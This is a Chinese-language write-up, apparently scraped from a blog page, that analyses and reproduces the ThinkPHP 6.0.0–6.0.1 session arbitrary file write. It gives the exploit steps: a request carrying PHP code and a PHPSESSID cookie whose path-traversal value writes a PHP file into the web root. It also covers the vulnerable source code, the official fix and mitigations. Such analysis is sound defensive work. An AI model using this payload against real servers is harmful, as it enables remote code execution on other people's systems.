ThinkPHP 6.0 任意文件写入漏洞分析与复现<\/h1>

漏洞概述<\/h2>
ThinkPHP 6.0.0 至 6.0.1 版本中存在一个任意文件写入漏洞，攻击者可以通过精心构造的会话ID（PHPSESSID）控制服务器上的文件写入位置和内容，可能导致远程代码执行等严重后果。<\/p>

影响版本<\/h2>

ThinkPHP 6.0.0<\/li>

ThinkPHP 6.0.1<\/li> <\/ul>

环境搭建<\/h2>

1. 安装ThinkPHP 6框架<\/h3>

# 安装Composer<\/span>
<\/span><\/span>curl -sS getcomposer.org\/installer | php
<\/span><\/span>mv composer.phar \/usr\/local\/bin\/composer
<\/span><\/span>
<\/span><\/span># 设置国内镜像<\/span>
<\/span><\/span>composer config -g repo.packagist composer https:\/\/mirrors.aliyun.com\/composer\/
<\/span><\/span>
<\/span><\/span># 安装ThinkPHP 6<\/span>
<\/span><\/span>composer create-project topthink\/think think6
<\/span><\/span><\/code><\/pre>2. 降级到漏洞版本<\/h3>
编辑项目根目录下的composer.json<\/code>文件，指定ThinkPHP版本为6.0.1或6.0.0，然后执行：<\/p>
composer update
<\/span><\/span><\/code><\/pre>3. 启用Session功能<\/h3>
默认情况下ThinkPHP 6不开启Session，需要修改app\/middleware.php<\/code>文件：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 全局中间件定义文件
<\/span><\/span><\/span><\/span>return<\/span> [
<\/span><\/span>    \/\/ Session初始化
<\/span><\/span><\/span><\/span>    \think\middleware\SessionInit<\/span>::<\/span>class<\/span>
<\/span><\/span>];
<\/span><\/span><\/code><\/pre>4. 启动开发服务器<\/h3>
php think run
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
漏洞利用条件<\/h3>

网站使用了Session功能<\/li>
存在可以设置Session变量的接口<\/li>
<\/ul>
漏洞利用步骤<\/h3>

修改app\/controller\/Index.php<\/code>添加Session设置功能：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> app\controller<\/span>;
<\/span><\/span>
<\/span><\/span>use<\/span> app\BaseController<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> Index<\/span> extends<\/span> BaseController<\/span> {
<\/span><\/span>    public<\/span> function<\/span> index<\/span>() {
<\/span><\/span>        $a =<\/span> isset<\/span>($_GET['a'<\/span>]) &&<\/span> !<\/span>empty<\/span>($_GET['a'<\/span>]) ?<\/span> $_GET['a'<\/span>] :<\/span> ''<\/span>;
<\/span><\/span>        $b =<\/span> isset<\/span>($_GET['b'<\/span>]) &&<\/span> !<\/span>empty<\/span>($_GET['b'<\/span>]) ?<\/span> $_GET['b'<\/span>] :<\/span> ''<\/span>;
<\/span><\/span>        session<\/span>($a, $b);
<\/span><\/span>        return<\/span> '<style type="text\/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px;} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }<\/style><div style="padding: 24px 48px;"> <h1>:) <\/h1><p> ThinkPHP V6<br\/><span style="font-size:30px">13载初心不改 - 你值得信赖的PHP框架<\/span><\/p><\/div><script type="text\/javascript" src="https:\/\/tajs.qq.com\/stats?sId=64890268" charset="UTF-8"><\/script><script type="text\/javascript" src="https:\/\/e.topthink.com\/Public\/static\/client.js"><\/script><think id="eab4b9f840753f8e7"><\/think>'<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
构造Payload访问URL：<\/li>
<\/ol>
http:\/\/target.com\/index.php?a=key&b=<?php phpinfo();?>
<\/code><\/pre>

设置Cookie头：<\/li>
<\/ol>
Cookie: PHPSESSID=..\/..\/public\/aaaaaaaaaaa.php
<\/code><\/pre>

访问写入的文件：<\/li>
<\/ol>
http:\/\/target.com\/aaaaaaaaaaa.php
<\/code><\/pre>
漏洞分析<\/h2>
漏洞根源<\/h3>
漏洞位于vendor\/topthink\/framework\/src\/think\/session\/Store.php<\/code>文件中，主要问题在于：<\/p>


Session ID验证不足<\/strong>：系统未对PHPSESSID进行严格验证，允许包含特殊字符如..\/<\/code>等路径遍历字符<\/p>
<\/li>

文件命名可控<\/strong>：当PHPSESSID长度为32时，系统不会对其进行MD5处理，直接使用原始值作为文件名<\/p>
<\/li>
<\/ol>
关键代码分析<\/h3>

Session ID处理流程<\/strong>：<\/li>
<\/ol>
\/\/ vendor\/topthink\/framework\/src\/think\/session\/Store.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> setId<\/span>($id)
<\/span><\/span>{
<\/span><\/span>    if<\/span> (strlen<\/span>($id) !=<\/span> 32<\/span>) {
<\/span><\/span>        $id =<\/span> md5<\/span>($id);
<\/span><\/span>    }
<\/span><\/span>    $this-><\/span>id<\/span> =<\/span> $id;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
文件写入位置<\/strong>：<\/li>
<\/ol>
\/\/ vendor\/topthink\/framework\/src\/think\/session\/driver\/File.php
<\/span><\/span><\/span><\/span>protected<\/span> function<\/span> getFileName<\/span>(string<\/span> $sessID):<\/span> string<\/span>
<\/span><\/span>{
<\/span><\/span>    return<\/span> $this-><\/span>config<\/span>['path'<\/span>] .<\/span> 'sess_'<\/span> .<\/span> $sessID;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
Session数据写入<\/strong>：<\/li>
<\/ol>
\/\/ vendor\/topthink\/framework\/src\/think\/session\/driver\/File.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> write<\/span>(string<\/span> $sessID, string<\/span> $sessData):<\/span> bool<\/span>
<\/span><\/span>{
<\/span><\/span>    $filename =<\/span> $this-><\/span>getFileName<\/span>($sessID);
<\/span><\/span>    return<\/span> file_put_contents<\/span>($filename, $sessData) !==<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击原理<\/h3>

攻击者通过Cookie设置PHPSESSID为..\/..\/public\/aaaaaaaaaaa.php<\/code>（长度为32）<\/li>
系统不进行MD5处理，直接使用该值作为文件名<\/li>
通过设置Session变量，将恶意代码写入Session文件<\/li>
最终在public目录下创建了一个PHP文件，内容为攻击者控制的Session数据<\/li>
<\/ol>
官方修复<\/h2>
官方在后续版本中增加了对Session ID的严格验证：<\/p>
\/\/ 修复后的代码
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> setId<\/span>($id)
<\/span><\/span>{
<\/span><\/span>    if<\/span> (!<\/span>ctype_alnum<\/span>($id) ||<\/span> strlen<\/span>($id) !=<\/span> 32<\/span>) {
<\/span><\/span>        $id =<\/span> md5<\/span>($id);
<\/span><\/span>    }
<\/span><\/span>    $this-><\/span>id<\/span> =<\/span> $id;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>增加了ctype_alnum()<\/code>函数检查，确保Session ID只包含字母和数字。<\/p>
防护建议<\/h2>

及时升级到ThinkPHP最新版本<\/li>
如果无法立即升级，可以手动修改Store.php<\/code>文件，添加Session ID验证<\/li>
限制Session文件的存储目录权限<\/li>
对用户输入的Session变量进行过滤<\/li>
<\/ol>
总结<\/h2>
该漏洞利用ThinkPHP 6.0.0-6.0.1版本中Session ID验证不足的问题，通过精心构造的PHPSESSID实现任意文件写入。攻击者可以借此在服务器上创建恶意PHP文件，进而实现远程代码执行。开发人员应及时升级框架版本或应用补丁，避免安全风险。<\/p>

ThinkPHP 6.0 任意文件写入漏洞分析与复现<\/h1>

漏洞概述<\/h2> ThinkPHP 6.0.0 至 6.0.1 版本中存在一个任意文件写入漏洞，攻击者可以通过精心构造的会话ID（PHPSESSID）控制服务器上的文件写入位置和内容，可能导致远程代码执行等严重后果。<\/p>

环境搭建<\/h2>

漏洞利用<\/h2>

漏洞分析<\/h2>

漏洞概述<\/h2>
ThinkPHP 6.0.0 至 6.0.1 版本中存在一个任意文件写入漏洞，攻击者可以通过精心构造的会话ID（PHPSESSID）控制服务器上的文件写入位置和内容，可能导致远程代码执行等严重后果。<\/p>